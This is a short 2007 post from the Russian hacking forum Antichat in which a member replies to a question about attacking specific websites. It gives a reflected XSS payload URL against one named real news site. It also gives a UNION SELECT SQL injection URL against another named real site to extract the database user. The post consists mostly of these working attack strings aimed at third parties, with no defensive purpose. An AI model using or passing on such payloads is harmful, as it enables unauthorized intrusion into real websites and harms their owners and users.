05.11.2007, 00:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Piflit
PHP код:
http://www.haber20.net/news_page.php?m=1&id=-2541
там выводится id. что-то можно с этим сделать? там скули нет, там пассивная XSS
Код:
http://www.haber20.net/news_page.php?m=1&id=2542%3Cscript%3Ealert(121212121)%3C/script%3E
насчет скули, наряду с вариантом ice1k`a возможен еще такой вариант:
Код:
http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4/*
__________________
Карфаген должен быть разрушен...
|
|
|